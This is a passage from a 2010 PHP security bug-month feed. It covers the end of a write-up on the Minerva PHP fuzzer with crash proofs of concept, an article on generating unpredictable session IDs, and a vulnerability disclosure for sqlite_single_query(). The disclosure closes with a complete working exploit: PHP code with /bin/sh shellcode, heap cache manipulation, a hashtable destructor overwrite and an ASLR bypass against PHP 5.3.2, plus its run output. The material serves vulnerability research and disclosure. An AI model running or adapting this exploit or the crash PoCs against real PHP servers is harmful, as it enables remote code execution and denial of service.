 +-------------------+
 | header            |
 +-------------------+
 | init              |
 +-------------------+
 | generated script  |
 .                   .
 .                   .
 |                   |
 +-------------------+
 | fini              |
 +-------------------+
 | footer            |
 +-------------------+

The header and footer sections are defined by Minerva in the src/minerva.py header() and footer() functions. The init and fini sections are optional and can be provided by the user to hold static content (e.g. some additional functions).
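The core loop from the pseudo-code in this section can be sketched in a few lines. The following is not Minerva's actual code (Minerva is written in Python); it is a PHP illustration under stated assumptions: the function database is a tiny hand-written array, types are plain strings, and the initial variables $s0 and $i0 are assumed to be defined by an init section.

```php
<?php
// Hypothetical miniature function database: name => array(return type, argument types).
$functions = array(
    'strlen'     => array('int',    array('string')),
    'str_repeat' => array('string', array('string', 'int')),
    'strrev'     => array('string', array('string')),
    'abs'        => array('int',    array('int')),
);

// $vars maps a type name to the list of variables of that type (the set X).
function generateScript(array $functions, array $vars, $n) {
    $script = '';
    for ($i = 0; $i < $n; $i++) {
        // GET_RANDOM: keep only functions whose argument types are all available.
        $usable = array();
        foreach ($functions as $name => $signature) {
            $covered = true;
            foreach ($signature[1] as $type) {
                if (empty($vars[$type])) {
                    $covered = false;
                    break;
                }
            }
            if ($covered) {
                $usable[] = $name;
            }
        }
        if (!$usable) {
            break; // nothing can be called with the variables we have
        }
        $name = $usable[array_rand($usable)];
        list($returnType, $argTypes) = $functions[$name];

        // Pick a random, correctly typed variable for every argument.
        $args = array();
        foreach ($argTypes as $type) {
            $args[] = $vars[$type][array_rand($vars[$type])];
        }

        // Fresh variable; record it together with the result type.
        $fresh = '$v' . $i;
        $vars[$returnType][] = $fresh;
        $script .= $fresh . ' = ' . $name . '(' . implode(', ', $args) . ");\n";
    }
    return $script;
}

$initial = array('string' => array('$s0'), 'int' => array('$i0'));
echo generateScript($functions, $initial, 5);
```

Each run prints five random but type-correct calls, and results of earlier calls become candidates for later arguments, which is what lets generated scripts reach deeper code paths than purely random arguments would.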

-[[ 2 b) Configuration file

The function database and default options can be defined in configuration file. Configuration file is organized as follows:

main section

 default_length - number of function calls
 default_output - output script filename
 modules - list of modules
 ignore_functions - list of ignored functions
 init - initial file
 fini - fini file

functions section

 module_name = [
   return_type function_name ( arguments_types ),
   ...
   ];

For syntax details, take a look at the example.conf file in the conf/ directory. Configuration options can also be passed on the command line. For a detailed list, run the program with the "--help" argument.

-[[ 2 c) Discovered bugs

This section presents Minerva's results for PHP 5.3.2 and 5.2.13. The testing environment is not described, to encourage future users to experiment with Minerva. The tests presented here focused on crashing the PHP interpreter: if it terminated with SIGSEGV, the script file was kept for future research. During a few hours of testing the standard modules, the following bugs were discovered:

fnmatch() - stack exhaustion caused by the glibc function fnmatch. It does not seem to be exploitable, but may be used to crash PHP remotely.

Proof of concept code:

  <?php
     $a57 = str_repeat("A",16000000);
     $a265 = fnmatch($a57,"");
  ?>
  $ php -v
  PHP 5.2.6-1+lenny8 with Suhosin-Patch 0.9.6.2 (cli) (built: Mar 14 2010 08:14:04)
  Copyright (c) 1997-2008 The PHP Group
  Zend Engine v2.2.0, Copyright (c) 1998-2008 Zend Technologies

  (gdb) r file.php
  Starting program: /usr/bin/php file.php
  [Thread debugging using libthread_db enabled]

  Program received signal SIGSEGV, Segmentation fault.
  0xb7a7bb0b in fnmatch () from /lib/i686/cmov/libc.so.6

Freeing context before freeing stream - During php_request_shutdown() (main/main.c), the context structure assigned to a stream is freed before the stream structure itself is freed. If the memory that was allocated for the context is dirty, this may cause a crash. This bug may be exploitable and needs more research.

Proof of concept:

  <?php
     $blah = fopen('/dev/zero','a');
     $arr = array();
     for ( $i = 0 ; $i < 5000 ; $i++ ) {
       $arr[$i] = "";
     }
     stream_context_get_options($blah);
     $a88 = fread($blah,100000000000);
  ?>
  $ php -v
  PHP 5.2.6-1+lenny8 with Suhosin-Patch 0.9.6.2 (cli) (built: Mar 14 2010 08:14:04)
  Copyright (c) 1997-2008 The PHP Group
  Zend Engine v2.2.0, Copyright (c) 1998-2008 Zend Technologies

  (gdb) r file.php
  Starting program: /usr/bin/php file.php
  [Thread debugging using libthread_db enabled]

  Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 1215752193 bytes) in /thanks/to/dft/test.php on line 8

  Program received signal SIGSEGV, Segmentation fault.
  0x0829ed83 in php_stream_context_del_link ()
  (gdb) bt
  #0  0x0829ed83 in php_stream_context_del_link ()
  #1  0x082a05c1 in _php_stream_free ()

Uninitialized memory in the sqlite extension - this bug, as well as its exploitation, is described in detail in the article that can be found in doc/sqlite.txt.

-[ 3. Future work

For now, Minerva is limited to the PHP language, but the approach can also bring good results for other scripting languages like Python or Perl, as well as for testing syscalls. Supporting more targets shouldn't be hard, but it requires Minerva to be more flexible. Minerva will therefore possibly be redesigned and rewritten in OCaml, and will be continued as a long-term project.

In the case of PHP there is still much work to do. Some modules need certain conditions to be satisfied, like passing a valid FTP server in the case of the ftp module; Minerva currently supports only those modules which can be fuzzed without 3rd party software. The second thing is that the project almost ignores the fact that PHP is an object-oriented language; a random class generator could be a benefit. It might include features like inheritance or overriding.

Some metrics could help to improve Minerva's efficiency. A good option is to measure how much PHP code is covered, which can be done using gcov [gcov], and then to apply some strategies (e.g. evolutionary) to cover more code.

Detecting bugs by waiting for SIGSEGV is a somewhat naive method; the project could benefit from -fmudflap or other dynamic analysis tools to uncover more bugs. Research in that field needs to be done in order to increase the project's
efficiency.

If you would like to help, or you just have an idea, comment or suggestion, please feel free to contact me.
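
For reference, the SIGSEGV check itself is simple to express. The following Python sketch is an assumption about how such a check could look, not code taken from Minerva; the helper name crashed_with_sigsegv is hypothetical, and the demo uses a child Python process that sends SIGSEGV to itself as a stand-in for running php on a generated script. It relies on POSIX semantics, where a negative return code means the process was killed by that signal.

```python
import signal
import subprocess
import sys


def crashed_with_sigsegv(command, timeout=60):
    """Run command and report whether it was terminated by SIGSEGV (POSIX only)."""
    try:
        result = subprocess.run(
            command,
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
            timeout=timeout,
        )
    except subprocess.TimeoutExpired:
        return False
    # On POSIX a negative return code -N means "killed by signal N".
    return result.returncode == -signal.SIGSEGV


# Stand-in for ["php", "generated.php"]: a child process that raises SIGSEGV on itself.
demo = [sys.executable, "-c", "import os, signal; os.kill(os.getpid(), signal.SIGSEGV)"]
print(crashed_with_sigsegv(demo))
```

A check like this only catches hard crashes, which is exactly the limitation noted above: memory errors that do not end in a signal go unnoticed.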

-[ A. Licence

Minerva project is released under the BEER-WARE license.

THE BEER-WARE LICENSE:
wrote this file. As long as you retain this notice you can do whatever you want with this stuff. If we meet some day, and you think this stuff is worth it, you can buy me a beer in return.

Borrowed from http://people.freebsd.org/~phk/

-[ B. Contact

You can reach me at:

MAIL: shm+minerva@digitalsun.pl
IRC: shm@freenode
WEB: http://digitalsun.pl/

-[ C. References:

[miller] http://pages.cs.wisc.edu/~bart/fuzz/Foreword1.html Miller’s site on fuzzing
[pff] http://www.setec.org/~calcite/code/pff/ PHP Fuzzing Framework
[lilxam] http://lilxam.free.fr/repo/hacking/PHP%20buffer%20overflow/PHP_BOF.pdf article in french about PHP fuzzing

-[ D. Further reading material:

http://en.wikipedia.org/wiki/Fuzz_testing briefly about fuzzing
http://pages.cs.wisc.edu/~bart/fuzz/ more on fuzzing
http://bitbucket.org/haypo/fusil/wiki/Home fusil fuzzer, written in Python supporting PHP fuzzing
http://web.archive.org/web/20070807083417/www.digitaldwarf.be/ digital dwarf fuzzers collection
http://events.ccc.de/congress/2005/fahrplan/events/537.en.html Fuzzing – Breaking software in an automated fashion

-[ E. Greetings:

I would like to thank the following people very much for their contribution:

  • Katabu for proof-reading and patience
  • Snooty for proof-reading and feedback
  • dft-labs for providing me with a testing environment

-[ F. Download:

DOWNLOAD Minerva

MOPS Submission 04 – Generating Unpredictable Session IDs and Hashes http://php-security.org/2010/05/09/mops-submission-04-generating-unpredictable-session-ids-and-hashes/ http://php-security.org/2010/05/09/mops-submission-04-generating-unpredictable-session-ids-and-hashes/#comments Sun, 09 May 2010 16:34:55 +0000 admin http://php-security.org/?p=204

Today we want to present the fourth external MOPS submission. It was submitted by Jordi Boggiano and explains how to generate unpredictable session ids and hashes in PHP.

Generating unpredictable session ids and hashes

Jordi Boggiano

It is not uncommon for web developers to have to generate random ids or hashes. For instance, large-scale projects or frameworks may want to implement their own PHP session handlers, either completely abstracted in their API or overloading PHP’s internal API using session_set_save_handler(). If you do so, unless you want to entrust PHP’s core with it, one thing you will have to take care of is generating unique session ids to send as a cookie to your users, allowing the session to persist. Other common use cases for such unique hashes are generating CSRF tokens to insert in forms or URLs, and authentication tokens for email validation and the like.

Common misconceptions and human errors

The most common error programmers make when implementing this is due to the fact that we humans are very bad at judging randomness. Especially once you add a hashing algorithm on top of it, it very quickly becomes impossible to discern whether the hashes you create are indeed unique and random enough. To illustrate, here are two outputs of md5(rand(1,5)):

eccbc87e4b5ce2fe28308fd9f2a7baf3
a87ff679a2f3e71d9181a67b7542122c

If you don’t know better and just look at those values, it all seems pretty random, but using this for your session id would basically mean you would have collisions once you get 5 concurrent users, and most likely even fewer, since two consecutive calls might return the same value.
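
The point is easy to verify by enumerating every possible output. The Python sketch below assumes that PHP's md5() is applied to the decimal string form of the integer, which is how PHP converts an integer argument; hashlib stands in for PHP's md5().

```python
import hashlib

# rand(1,5) can only ever yield 1, 2, 3, 4 or 5, so only five ids exist.
possible = {hashlib.md5(str(n).encode("ascii")).hexdigest() for n in range(1, 6)}
for digest in sorted(possible):
    print(digest)
print(len(possible), "distinct ids in total")
```

However random each digest looks, the whole id space has five members, and both values shown above are among them.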

Most developers have some clue and wouldn’t make such an obvious mistake, but here comes another common one: “let’s use time!”. Indeed, time is linear and if you use microtime(true), you will have pretty unique ids and very low chances of collisions unless you have a high-load site with multiple servers. However, this is very insecure: since anyone knows the approximate time of your server, an attacker could generate hashes for every microsecond and then potentially hijack a session. I won’t go into further detail about the ways those attacks work, since this article is more about securing your site than hijacking sessions.
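
To give a sense of how small that search space is, here is a minimal Python sketch. Everything in it is an assumption made for illustration: the id scheme (MD5 of an integer microsecond timestamp), the function names and the sample timestamps are hypothetical, and a real application would format its time value differently.

```python
import hashlib


def token_for(microseconds):
    """Hypothetical id scheme: MD5 of a microsecond timestamp."""
    return hashlib.md5(str(microseconds).encode("ascii")).hexdigest()


def recover_timestamp(token, approx_us, window_us):
    """Try every microsecond within +/- window_us of the guessed time."""
    for candidate in range(approx_us - window_us, approx_us + window_us + 1):
        if token_for(candidate) == token:
            return candidate
    return None


secret_time = 1273422895123456          # server-side timestamp in microseconds
victim_token = token_for(secret_time)
guess = 1273422895000000                # only the second is known
print(recover_timestamp(victim_token, guess, 200000))
```

Knowing the time to within a fraction of a second leaves only a few hundred thousand candidates, which a single machine can hash almost instantly.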

Another common approach is to use rand(), mt_rand(), or uniqid(). The first two are somewhat random but more sophisticated attacks can also render them quite dangerous to rely upon, while the latter is just based on the time, so it’s not offering any benefits over using microtime().

Randomness explained

The main thing to understand is how random values are generated. Computers are deterministic machines: they are made to be reliable and consistently produce the same output for a given input, so asking them to generate anything out of thin air is extremely difficult. To circumvent this, operating systems have ways to get truly random values that are virtually impossible to guess. These use entropy (i.e. noise or chaos) generated by the machine’s environment, aggregating various inputs like hard-drive I/O, fan speed, etc.

Two variants are available on most UNIX machines, exposed as files you can read randomness from. /dev/random is a high-quality, blocking random number generator: what you read from it is consumed, so its pool might be empty, blocking your application until it is filled again and you can read from it. This is fine on high load servers but it’s quite dangerous, since if it gets empty, new users waiting for a session id will have to wait for seconds or the request will time out completely, not quite the first experience you’d want them to have. The other alternative is /dev/urandom, the non-blocking variant. This one records data and will instantaneously serve you a chunk of it. It is therefore of lesser quality since it will potentially give you similar output twice, but it is the best you can get if you can’t rely on /dev/random being fast enough, and it will beat PHP’s mt_rand() any day.
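
As a point of comparison outside PHP, Python exposes the operating system's generator through os.urandom(), which draws on the same kind of source as /dev/urandom on UNIX-like systems. The sketch below is only an illustration of reading 64 bytes and making them printable; the variable names are arbitrary.

```python
import binascii
import os

raw = os.urandom(64)                           # 64 bytes from the OS generator
token = binascii.hexlify(raw).decode("ascii")  # hex-encode so it is safe to print
print(len(token))
```

Hex encoding doubles the length (two characters per byte) but leaves only characters that are safe in cookies and URLs.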

The Windows counterpart is sadly not built as a file anyone can read from, but is available through the OS API. From PHP, you can call it via the COM extension. See the example at the end of this post for more details.

Also, as of PHP 5.3.0, the openssl_random_pseudo_bytes() function provides you with a good algorithm from libssl that returns pseudo-random bytes. If you use it, be sure to check the value of the $strong parameter though, because if it’s not true, the algorithm couldn’t use the optimal method, in which case you’d better do it yourself.

Hash algorithms

Getting random data is one thing, but then you most likely want to normalize it, which has two benefits: hiding what you used to create the unique id, and making it safe to be stored and passed as a cookie. Leaking random data to the user might give an attacker a hint as to what method you used to generate it, so it’s better not to. And trying to set a cookie with data that contains weird characters might leave you with corrupted headers or a PHP warning appearing on some pages, which is hard to debug.

For this purpose, PHP offers the hash extension, which is enabled by default and available since PHP 5.1.2, so it should run on most hosts by now. By executing hash_algos() or via your phpinfo page, you can see which algorithms are supported by your version. There are a lot of algorithms to choose from, and they vary a lot in quality. Some are not designed for cryptographic purposes and are therefore very prone to collision attacks, while some were once great but have since been broken. The other criterion for picking one is the speed at which it runs: a slow algorithm means an attacker will have to use more processing power in order to brute-force his way in, so you don’t want an algorithm that performs well. There is a benchmark available in the user comments of the hash() function page, which shows, at the time of this writing, that Whirlpool is one of the slowest, and it would be my recommendation since it offers good cryptographic quality on top of that. However, keep an eye out for security advisories. Cryptographic algorithms are permanently under attack and it is not guaranteed that Whirlpool will still be a good choice 5 years from now.

And while it is not really the topic of this article, please note that even though MD5 is very popular, it is not a good idea for password hashing since, due to its popularity, many people have built rainbow tables for it.

The final solution, for now..

To summarize, here is a basic implementation that should provide optimal results on any machine. It works best on UNIX; until the Windows API is supported by PHP, you can’t really do more there.

function generateUniqueId($maxLength = null) {
    $entropy = '';

    // try ssl first
    if (function_exists('openssl_random_pseudo_bytes')) {
        $entropy = openssl_random_pseudo_bytes(64, $strong);
        // skip ssl since it wasn't using the strong algo
        if($strong !== true) {
            $entropy = '';
        }
    }

    // add some basic mt_rand/uniqid combo
    $entropy .= uniqid(mt_rand(), true);

    // try to read from the windows RNG
    if (class_exists('COM')) {
        try {
            $com = new COM('CAPICOM.Utilities.1');
            $entropy .= base64_decode($com->GetRandom(64, 0));
        } catch (Exception $ex) {
        }
    }

    // try to read from the unix RNG
    if (is_readable('/dev/urandom')) {
        $h = fopen('/dev/urandom', 'rb');
        $entropy .= fread($h, 64);
        fclose($h);
    }

    $hash = hash('whirlpool', $entropy);
    if ($maxLength) {
        return substr($hash, 0, $maxLength);
    }
    return $hash;
}

This code takes care of having decent basic entropy through a combination of uniqid() and mt_rand(), and then adds some more from /dev/urandom, libssl and Windows’ API, depending on what is available. Finally, it hashes it all with the Whirlpool algorithm and returns that. It also provides you with a maxLength option that allows you to get shorter hashes, since Whirlpool returns 128-character strings, and that might be a bit much if you plan to use it for a URL token. However, cutting it means reducing its uniqueness, so do it with caution.
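
How much uniqueness is lost by truncating can be estimated with the usual birthday-bound approximation. The Python sketch below assumes the ids are uniformly distributed hex strings, so each kept character carries 4 bits; the function name collision_probability and the sample sizes are hypothetical.

```python
import math


def collision_probability(hex_chars, tokens):
    """Birthday-bound approximation for ids truncated to hex_chars hex characters."""
    space = 16.0 ** hex_chars        # each hex character carries 4 bits
    # 1 - exp(-n(n-1)/(2N)), written with expm1 to stay accurate for tiny values
    return -math.expm1(-tokens * (tokens - 1) / (2.0 * space))


for length in (8, 16, 32):
    print(length, collision_probability(length, 1000000))
```

With 8 characters, two of roughly 77,000 issued ids are already more likely than not to collide, whereas at 32 characters the probability for a million ids is negligible.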


MOPS Submission 03 – sqlite_single_query(), sqlite_array_query() Uninitialized Memory Usage http://php-security.org/2010/05/07/mops-submission-03-sqlite_single_query-sqlite_array_query-uninitialized-memory-usage/ http://php-security.org/2010/05/07/mops-submission-03-sqlite_single_query-sqlite_array_query-uninitialized-memory-usage/#comments Fri, 07 May 2010 11:08:04 +0000 admin http://php-security.org/?p=133

Today we want to present the third external MOPS submission. It is the first of two submissions sent in by Mateusz Kocielski. This one is a detailed explanation of how to exploit the sqlite_single_query() and sqlite_array_query() uninitialized memory usage.

-[ sqlite_single_query, sqlite_array_query uninitialized memory usage
-[ Mateusz Kocielski, shm+minerva@digitalsun.pl
-[ version: 1.0

Table of contents:

  1. Introduction
  2. Vulnerability
  3. Exploitation
  4. Resources
  5. Code fix
  6. Greetings

-[ 1. Introduction

PHP [php] is a very popular, object-oriented scripting language, mostly used in web development to produce dynamic pages. Its processor is supported by most modern web platforms.

This article describes an uninitialized memory usage bug in one of the standard modules. The bug was uncovered by the Minerva fuzzer [minerva]. The document gives a detailed description of the bug and a brief journey through PHP internals in order to exploit this vulnerability.

-[ 2. Vulnerability

The bug appears in the sqlite_single_query() [sq_sq] and sqlite_array_query() [sq_aq] functions of the sqlite module [sqlite]. The functions are defined in the ext/sqlite/sqlite.c file [sqlite.c]. We’ll consider only the sqlite_single_query() function, because the bug in the second case is similar.

-[ 2.1 Vulnerable code

Vulnerable code looks as follows:

source: ext/sqlite/sqlite.c

/* {{{ proto array sqlite_single_query(resource db, string query [, bool
first_row_only [, bool decode_binary]])
Executes a query and returns either an array for one single column or the
value of the first row. */


PHP_FUNCTION(sqlite_single_query)
{
       ...
       struct php_sqlite_result *rres;
       ...
       rres = (struct php_sqlite_result *)emalloc(sizeof(*rres)); [1]
       sqlite_query(NULL, db, sql, sql_len, PHPSQLITE_NUM, 0, NULL, &rres, NULL
           TSRMLS_CC); [2]
       ...
       real_result_dtor(rres TSRMLS_CC); [3]
}

The problem is that the memory allocated for rres in [1] is not initialized (i.e. zeroed) by [2]. If the query is empty, “dirty” memory may be passed to real_result_dtor in [3].

source: ext/sqlite/sqlite.c

static void real_result_dtor(struct php_sqlite_result *res TSRMLS_DC)
{
       int i, j, base;

       if (res->vm) {
               sqlite_finalize(res->vm, NULL);
       }

       if (res->table) {
               if (!res->buffered && res->nrows) {
                       res->nrows = 1; /* only one row is stored */
               }
               for (i = 0; i < res->nrows; i++) {
                       base = i * res->ncolumns;
                       for (j = 0; j < res->ncolumns; j++) {
                               if (res->table[base + j] != NULL) {
                                       efree(res->table[base + j]);
                               }
                       }
               }
               efree(res->table); [1]
       }

       if (res->col_names) {
               for (j = 0; j < res->ncolumns; j++) {
                       efree(res->col_names[j]);
               }
               efree(res->col_names); [2]
       }

   ...

       efree(res);
}

If the res passed to real_result_dtor can somehow be controlled, this could lead to a double free, which in fact can be easily exploited. For more details in that area, look at the exploit archive of the MOPB-2007 [mopb].

-[ 3. Exploitation

This section discusses the material needed to understand how the provided exploit works. The technique presented can be reused in all cases where an attacker can control the argument passed to the efree() function.

The goal is to play out the following steps:

  1. Control memory allocated as rres in sqlite_single_query.
  2. Use real_result_dtor to free memory in an area which can be controlled by the attacker.
  3. Allocate hashtable structure in the controlled area.
  4. Replace hashtable destructor with pointer to the shellcode.
  5. Trigger the destructor.

-[ 3.1. PHP memory management

PHP has its own memory management (mm) implementation; the mm functions are defined in the Zend/zend_alloc.c file.

source: Zend/zend_alloc.c

static void *_zend_mm_alloc_int(zend_mm_heap *heap, size_t size
   ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC) /* {{{ */
{
       zend_mm_free_block *best_fit;
       size_t true_size = ZEND_MM_TRUE_SIZE(size);
       ...

       if (EXPECTED(ZEND_MM_SMALL_SIZE(true_size))) {
               size_t index = ZEND_MM_BUCKET_INDEX(true_size);
               ...
#if ZEND_MM_CACHE
               if (EXPECTED(heap->cache[index] != NULL)) {
                       /* Get block from cache */
                       ...
                       best_fit = heap->cache[index];
                       heap->cache[index] = best_fit->prev_free_block;
                       heap->cached -= true_size;
                       ...
                       return ZEND_MM_DATA_OF(best_fit);
               }
...
static void _zend_mm_free_int(zend_mm_heap *heap, void *p
   ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC) /* {{{ */
{
       zend_mm_block *mm_block;
       zend_mm_block *next_block;
       size_t size;

       if (!ZEND_MM_VALID_PTR(p)) {
               return;
       }
       mm_block = ZEND_MM_HEADER_OF(p);
       size = ZEND_MM_BLOCK_SIZE(mm_block);
...
       if (EXPECTED(ZEND_MM_SMALL_SIZE(size)) && EXPECTED(heap->cached
             < ZEND_MM_CACHE_SIZE)) {
               size_t index = ZEND_MM_BUCKET_INDEX(size);
               zend_mm_free_block **cache = &heap->cache[index];

               ((zend_mm_free_block*)mm_block)->prev_free_block = *cache;
               *cache = (zend_mm_free_block*)mm_block;
               ...
               return;
       }
...

The PHP mm implementation caches small blocks in buckets identified by block size. As the listing shows, a freed block is pushed onto the head of its bucket and an allocation takes the block at the head, so each cache bucket behaves as a LIFO (last in, first out) stack. _zend_mm_alloc_int and _zend_mm_free_int are called directly by the emalloc and efree functions. We can try to inject a block into the cache buckets which will be used in the future. This can be done by passing to efree a pointer into an area of memory that can be modified by the attacker. In order to do that, a "fake" zend_mm_block has to be stored there and its address passed.

source: Zend/zend_alloc.c

typedef struct _zend_mm_block_info {
#if ZEND_MM_COOKIES
       size_t _cookie;
#endif
       size_t _size;
       size_t _prev;
} zend_mm_block_info;

typedef struct _zend_mm_block {
       zend_mm_block_info info;
#if ZEND_DEBUG
       unsigned int magic;
# ifdef ZTS
       THREAD_T thread_id;
# endif
       zend_mm_debug_info debug;
#elif ZEND_MM_HEAP_PROTECTION
       zend_mm_debug_info debug;
#endif
} zend_mm_block;
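
The caching behaviour visible in _zend_mm_free_int and _zend_mm_alloc_int can be modelled in a few lines. The following Python sketch is a toy model written for illustration, not the real Zend allocator: the BlockCache class and the string "blocks" are hypothetical, and the cache size limit is ignored.

```python
class BlockCache:
    """Toy model of the per-size free-block cache (not the real Zend allocator)."""

    def __init__(self):
        self.buckets = {}                     # block size -> stack of cached blocks

    def free(self, block, size):
        # Mirrors: prev_free_block = *cache; *cache = block  (push on the head)
        self.buckets.setdefault(size, []).append(block)

    def alloc(self, size):
        # Mirrors: best_fit = cache[index]; cache[index] = best_fit->prev_free_block
        stack = self.buckets.get(size)
        if stack:
            return stack.pop()                # most recently freed block comes back first
        return "fresh block of %d bytes" % size


cache = BlockCache()
cache.free("old block", 40)
cache.free("attacker-filled block", 40)
print(cache.alloc(40))
```

Because the most recently freed block of a given size is the first one handed out again, whoever frees last decides what the next allocation of that size will contain.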

-[ 3.2. Controlling memory allocated as rres

Controlling rres could be used to do something nasty, but how can it be controlled so that a crafted address is passed to efree? rres is of type php_sqlite_result, which has the following definition:

source: ext/sqlite/sqlite.c

struct php_sqlite_result {
       struct php_sqlite_db *db;
       sqlite_vm *vm;
       int buffered;
       int ncolumns;
       int nrows;
       int curr_row;
       char **col_names;
       int alloc_rows;
       int mode;
       char **table;
};

Its size is 40 bytes on a 32-bit machine, so, according to the previous subsection, emalloc will try to use a block from the cache buckets. The obvious way to control rres is to push our own memory into the bucket just before the sqlite_single_query call. One way to do this is to call the str_repeat function:

$ cat test.php
<?php
$dh = sqlite_popen("/tmp/whatever");
str_repeat("A",39); // +1 byte for \x00
$dummy = sqlite_single_query($dh," "); // trigger the bug
?>
$ gdb ./php
...
(gdb) r test.php
...
Program received signal SIGSEGV, Segmentation fault.
sqliteVdbeFinalize (p=0x41414141, pzErrMsg=0x0)
   at /home/shm/projekty/security/src/php-5.3.2/ext/sqlite/libsqlite/src/vdbeaux.c:924
924       if( p->magic!=VDBE_MAGIC_RUN && p->magic!=VDBE_MAGIC_HALT ){
(gdb) bt
#0  sqliteVdbeFinalize (p=0x41414141, pzErrMsg=0x0)
   at /home/shm/projekty/security/src/php-5.3.2/ext/sqlite/libsqlite/src/vdbeaux.c:924
#1  0x081d2d52 in real_result_dtor (res=0x86f5fec)
   at /home/shm/projekty/security/src/php-5.3.2/ext/sqlite/sqlite.c:695
#2  0x081d3cb8 in zif_sqlite_single_query (ht=2, return_value=0x86f5fd0,
   return_value_ptr=0x0, this_ptr=0x0, return_value_used=1)
   at /home/shm/projekty/security/src/php-5.3.2/ext/sqlite/sqlite.c:2660
...
(gdb) x/10x 0x86f5fec
0x86f5fec:      0x00000000      0x41414141      0x41414141      0x41414141
0x86f5ffc:      0x41414141      0x41414141      0x41414141      0x41414141
0x86f600c:      0x41414141      0x00414141
(gdb)

As we can see, most of the values in the php_sqlite_result struct can be controlled.
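
The 40-byte figure and the position of each field can be checked with a small calculation. The Python sketch below assumes a 32-bit little-endian target where pointers and ints are both 4 bytes and no padding is needed; the FIELDS table simply restates the struct definition above.

```python
import struct

# 32-bit little-endian layout: pointers ("I") and ints ("i") are 4 bytes each.
FIELDS = [
    ("db", "I"), ("vm", "I"), ("buffered", "i"), ("ncolumns", "i"),
    ("nrows", "i"), ("curr_row", "i"), ("col_names", "I"),
    ("alloc_rows", "i"), ("mode", "i"), ("table", "I"),
]

layout = "<" + "".join(code for _, code in FIELDS)
offset = 0
for name, code in FIELDS:
    print("%-10s offset %2d" % (name, offset))
    offset += struct.calcsize("<" + code)
print("total", struct.calcsize(layout))
```

The vm pointer sits at offset 4, which matches the gdb session above: the second word of the block is 0x41414141, and that is the value sqliteVdbeFinalize receives as p.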

-[ 3.3 Hashtables

In PHP, every hash table holds a pointer to its destructor, which can be used to jump to the shellcode. The HashTable struct looks as follows:

source: Zend/zend_hash.h

typedef struct _hashtable {
       uint nTableSize;
       uint nTableMask;
       uint nNumOfElements;
       ulong nNextFreeElement;
       Bucket *pInternalPointer;
       Bucket *pListHead;
       Bucket *pListTail;
       Bucket **arBuckets;
       dtor_func_t pDestructor;
       zend_bool persistent;
       zend_bool unicode;
       unsigned char nApplyCount;
       zend_bool bApplyProtection;
#if ZEND_DEBUG
       int inconsistent;
#endif
} HashTable;

The length of this structure is 41 bytes. The value can be replaced by pushing a 41-byte block into the cache buckets and then trying to get this block allocated for a hashtable structure. pDestructor can be triggered by using the unset() function.

-[ 3.4 Exploit

The previous paragraphs omit a description of Linux security features such as ASLR; the exploit presented here is written to bypass those protections. For further information, take a look at the comments. The exploit was successfully used against php-5.3.2 and php-5.2.13 on Linux 2.6.

source: exploit.php

<?php

/* sqlite_single_query exploit for php-5.3.2
 * discovered and exploited   by  digitalsun
 *
 * e-mail  : ds@digitalsun.pl
 * website : http://www.digitalsun.pl/
 */


/* DEFINE */

define('EVIL_SPACE_ADDR', 0xb6f00000);
define('EVIL_SPACE_SIZE', 1024*1024);

$SHELLCODE =
"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80";

/* Initialize */
$sqh = sqlite_popen("/tmp/whatever");

/* allocate memory for evil table */
$EVIL_TABLE = str_repeat("\x31\x00\x00\x00", EVIL_SPACE_SIZE);
/* allocate memory for shellcode  */
$CODE = str_repeat("\x90\x90\x90\x90", EVIL_SPACE_SIZE);

for ( $i = 0, $j = EVIL_SPACE_SIZE*4 - strlen($SHELLCODE) - 1 ;
        $i < strlen($SHELLCODE) ; $i++, $j++ ) {
    $CODE[$j] = $SHELLCODE[$i];
}

$rres =
/* struct php_sqlite_result {        */
/*         struct php_sqlite_db *db; */ "AAAA" .
/*         sqlite_vm *vm;            */ "\x00\x00\x00\x00"         .
/*         int buffered;             */ "\x00\x00\x00\x00"         .
/*         int ncolumns;             */ "\x00\x00\x00\x00"         .
/*         int nrows;                */ "\x00\x00\x00\x00"         .
/*         int curr_row;             */ "\x00\x00\x00\x00"         .
/*         char **col_names;         */ pack('L', EVIL_SPACE_ADDR) .
/*         int alloc_rows;           */ "\x00\x00\x00\x00"         .
/*         int mode;                 */ "\x00\x00\x00\x00"         .
/*         char **table;             */ "\x00\x00\x00"             ; // + one byte for \x00
/* };*/

str_repeat($rres,1);
$dummy = sqlite_single_query($sqh," ");

/* get hash table */
$array = array(array());

/* find hash table */

$hash_table_offset = NULL;

for ( $i = 0 ; $i < strlen($EVIL_TABLE) ; $i+=4 )
{
    if ( $EVIL_TABLE[$i] != "\x31" ) {
        $hash_table_offset = $i;
        break;
    }
}

if ( is_null($hash_table_offset) )
    die("[-] Couldn't find hash table, exiting.");
else
{
    printf("[+] hashtable found @ 0x%08x\n", $hash_table_offset);
}

/* change the destructor */
$shellcode_addr = EVIL_SPACE_ADDR-EVIL_SPACE_SIZE*4-$hash_table_offset;
printf("[+] guessed shellcode address: 0x%08x\n", $shellcode_addr);
$shellcode_addr = pack('L', $shellcode_addr);

$EVIL_TABLE[$hash_table_offset+8*4+3] = $shellcode_addr[3];
$EVIL_TABLE[$hash_table_offset+8*4+2] = $shellcode_addr[2];
$EVIL_TABLE[$hash_table_offset+8*4+1] = $shellcode_addr[1];
$EVIL_TABLE[$hash_table_offset+8*4+0] = $shellcode_addr[0];

printf("[+] jumping to the shellcode\n");
/* trigger the destructor */
unset($array);


die('[-] failed ;[');
?>
$ ./php -v
PHP 5.3.2 (cli) (built: Mar 29 2010 13:35:08)
Copyright (c) 1997-2010 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
$ ./php exploit.php
[+] hashtable found @ 0x00158fe8
[+] guessed shellcode address: 0xb69a7018
[+] jumping to the shellcode
Hello, World!
...

-[ 4. Resources

[minerva] Will be filled in next week Minerva PHP Fuzzer
[mopb] http://www.php-security.org/MOPB/ Month of PHP bugs, 2007
[php] http://www.php.net/ PHP homepage
[sq_aq] http://www.php.net/manual/en/function.sqlite-array-query.php sqlite_array_query() documentation
[sq_sq] http://www.php.net/manual/en/function.sqlite-single-query.php sqlite_single_query() documentation
[suhosin] http://www.hardened-php.net/suhosin/a_feature_list.html Suhosin feature list
[sqlite] http://www.php.net/manual/en/book.sqlite.php sqlite module documentation
